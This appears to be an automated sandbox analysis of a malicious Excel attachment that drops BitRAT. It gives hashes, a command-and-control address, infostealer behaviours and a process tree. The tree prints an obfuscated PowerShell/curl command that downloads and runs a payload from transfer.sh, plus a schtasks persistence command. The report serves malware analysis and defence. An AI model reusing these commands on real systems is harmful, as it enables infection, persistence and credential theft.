Analysis
-
max time kernel
85s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
18-09-2023 08:50
Behavioral task
behavioral1
Sample
Documento_Orslgroup_S.R.L_09_2023.xls
Resource
win7-20230831-en
General
-
Target
Documento_Orslgroup_S.R.L_09_2023.xls
-
Size
100KB
-
MD5
c678822324d3db11afb66ad4dc9a5bb8
-
SHA1
db82a3d3de0b0d90cc302e903e18dd9d2fb684c4
-
SHA256
d77795d4563d03c0ec79533ac468580fa94ae26a54b5e14e34c3d6bdf9ae51b0
-
SHA512
7a753d605ee1e5e14d3dbf0a67feb80c8fee21c0bdc7cba36298eead743b541e65d5d4d3f25124ec8d4ad54c38744f244bb721f7c0edb76d1a3441c0d291d03e
-
SSDEEP
3072:BrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeYD:pxEtjPOtioVjDGUU1qfDlavx+W2QnAnF
Malware Config
Extracted
bitrat
1.38
185.225.75.68:3569
-
communication_password
0edcbe7d888380c49e7d1dcf67b6ea6e
-
tor_process
tor
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4600 232 cmd.exe 21 -
Blocklisted process makes network request 1 IoCs
flow pid Process 31 536 powershell.exe -
Downloads MZ/PE file
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x0006000000023236-152.dat acprotect behavioral2/files/0x0006000000023236-153.dat acprotect -
Executes dropped EXE 5 IoCs
pid Process 3504 pxpr0.exe 4940 pxpr0.exe 2060 pxpr0.exe 4084 pxpr0.exe 432 hope.exe -
Loads dropped DLL 1 IoCs
pid Process 4084 pxpr0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/2060-117-0x0000000000400000-0x00000000008DC000-memory.dmp upx behavioral2/memory/2060-120-0x0000000000400000-0x00000000008DC000-memory.dmp upx behavioral2/memory/2060-122-0x0000000000400000-0x00000000008DC000-memory.dmp upx behavioral2/memory/2060-121-0x0000000000400000-0x00000000008DC000-memory.dmp upx behavioral2/memory/2060-197-0x0000000000400000-0x00000000008DC000-memory.dmp upx -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts pxpr0.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4940 pxpr0.exe 4940 pxpr0.exe 4940 pxpr0.exe 4940 pxpr0.exe 4940 pxpr0.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3504 set thread context of 4940 3504 pxpr0.exe 94 PID 4940 set thread context of 2060 4940 pxpr0.exe 104 PID 2060 set thread context of 4084 2060 pxpr0.exe 105 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2320 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 232 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 536 powershell.exe 536 powershell.exe 4084 pxpr0.exe 4084 pxpr0.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 536 powershell.exe Token: SeShutdownPrivilege 4940 pxpr0.exe Token: SeDebugPrivilege 4084 pxpr0.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 232 EXCEL.EXE 232 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 232 EXCEL.EXE 4940 pxpr0.exe 4940 pxpr0.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 232 wrote to memory of 4600 232 EXCEL.EXE 88 PID 232 wrote to memory of 4600 232 EXCEL.EXE 88 PID 4600 wrote to memory of 536 4600 cmd.exe 90 PID 4600 wrote to memory of 536 4600 cmd.exe 90 PID 536 wrote to memory of 3504 536 powershell.exe 93 PID 536 wrote to memory of 3504 536 powershell.exe 93 PID 536 wrote to memory of 3504 536 powershell.exe 93 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 4940 3504 pxpr0.exe 94 PID 3504 wrote to memory of 384 3504 pxpr0.exe 95 PID 3504 wrote to memory of 384 3504 pxpr0.exe 95 PID 3504 wrote to memory of 384 3504 pxpr0.exe 95 PID 3504 wrote to memory of 2940 3504 pxpr0.exe 100 PID 3504 wrote to memory of 2940 3504 pxpr0.exe 100 PID 3504 wrote to memory of 2940 3504 pxpr0.exe 100 PID 3504 wrote to memory of 4984 3504 pxpr0.exe 99 PID 3504 wrote to memory of 4984 3504 pxpr0.exe 99 PID 3504 wrote to memory of 4984 3504 pxpr0.exe 99 PID 2940 wrote to memory of 2320 2940 cmd.exe 101 PID 2940 wrote to memory of 2320 2940 cmd.exe 101 PID 2940 wrote to memory of 2320 2940 cmd.exe 101 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 4940 wrote to memory of 2060 4940 pxpr0.exe 104 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105 PID 2060 wrote to memory of 4084 2060 pxpr0.exe 105
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Documento_Orslgroup_S.R.L_09_2023.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\SYSTEM32\cmd.execmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/SkazYLa2BT/happy.e^xe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell /W 01 curl https://transfer.sh/get/SkazYLa2BT/happy.exe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Users\Public\pxpr0.exe"C:\Users\Public\pxpr0.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Users\Public\pxpr0.exe"C:\Users\Public\pxpr0.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Users\Public\pxpr0.exe-a "C:\Users\Admin\AppData\Local\f9be9104\plg\y1wKS0Zk.json"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Users\Public\pxpr0.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\hope"5⤵PID:384
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c copy "C:\Users\Public\pxpr0.exe" "C:\Users\Admin\AppData\Roaming\hope\hope.exe"5⤵PID:4984
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f5⤵
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f6⤵
- Creates scheduled task(s)
PID:2320
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\hope\hope.exeC:\Users\Admin\AppData\Roaming\hope\hope.exe1⤵
- Executes dropped EXE
PID:432
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD5ce3e2f5f04eff81b3b7130a90a8e3a6e
SHA1fe9ac39d1db0a28aeef54741003d3f639125dc1c
SHA256b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631
SHA5128cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357
-
Filesize
1KB
MD5ce3e2f5f04eff81b3b7130a90a8e3a6e
SHA1fe9ac39d1db0a28aeef54741003d3f639125dc1c
SHA256b45d1dda071c8ee6b1078e8f71661ee1511887daf491a9f81415232a3c3bd631
SHA5128cd831f9231cc30eeed546b47401459a2737d160faf0eacc823d286de22f79d68a95b994dce1f1eb6e7fa96e24aadeac50659115afe74148a33e6d31012ed357
-
Filesize
320KB
MD5659f8678ab71664d078f321c32f54896
SHA1bb5398c6f36f06d26b1cb8e7bd3a706c5b95c343
SHA256634f276b899acd8afbc50d90959f9c97a43f711ebb89e820d09956cbdb0d53a4
SHA5124460d18cb887cc28ace24192d88adf66505789d0c099a8ccd01c83fe6e5cb5c3aac14c8e6424d10e8a0d34f06f943fd30f86ae12704bd870fdb7e5623f66d585
-
Filesize
108KB
MD56c0575ff2f0ae25408ea372ca42eea5d
SHA19bd7b2490eef9cf42bf515ed81f47e5329214688
SHA256d45a744f2cfeac5374d363fe0adf447d2ddab762f9c28e0a13d4ead977cb099d
SHA5123abc11b8630e80eec137f2ffde65b2dc4ad12f5c6c1a66041fe9ba48a448e5831151c465c226287f96394b21996a039e62d553bd91921b975f2b180a53d0e107
-
Filesize
7.6MB
MD59f42c993b0f9560fce2ac89d5b823b3b
SHA17c3ae9d0a92335ec5076490af4544a071d69c6d4
SHA2563e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943
SHA512867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379
-
Filesize
104B
MD54f3bde9212e17ef18226866d6ac739b6
SHA1732733bec8314beb81437e60876ffa75e72ae6cd
SHA256212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174
SHA51210b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744
-
Filesize
104B
MD5bf5da170f7c9a8eae88d1cb1a191ff80
SHA1dd1b991a1b03587a5d1edc94e919a2070e325610
SHA256e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd
SHA5129e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e
-
Filesize
793KB
MD586114faba7e1ec4a667d2bcb2e23f024
SHA1670df6e1ba1dc6bece046e8b2e573dd36748245e
SHA256568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d
SHA512d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f
-
Filesize
793KB
MD586114faba7e1ec4a667d2bcb2e23f024
SHA1670df6e1ba1dc6bece046e8b2e573dd36748245e
SHA256568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d
SHA512d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f
-
Filesize
7.6MB
MD59f42c993b0f9560fce2ac89d5b823b3b
SHA17c3ae9d0a92335ec5076490af4544a071d69c6d4
SHA2563e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943
SHA512867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379
-
Filesize
7.6MB
MD59f42c993b0f9560fce2ac89d5b823b3b
SHA17c3ae9d0a92335ec5076490af4544a071d69c6d4
SHA2563e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943
SHA512867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379
-
Filesize
7.6MB
MD59f42c993b0f9560fce2ac89d5b823b3b
SHA17c3ae9d0a92335ec5076490af4544a071d69c6d4
SHA2563e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943
SHA512867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379
-
Filesize
7.6MB
MD59f42c993b0f9560fce2ac89d5b823b3b
SHA17c3ae9d0a92335ec5076490af4544a071d69c6d4
SHA2563e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943
SHA512867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379
-
Filesize
7.6MB
MD59f42c993b0f9560fce2ac89d5b823b3b
SHA17c3ae9d0a92335ec5076490af4544a071d69c6d4
SHA2563e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943
SHA512867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379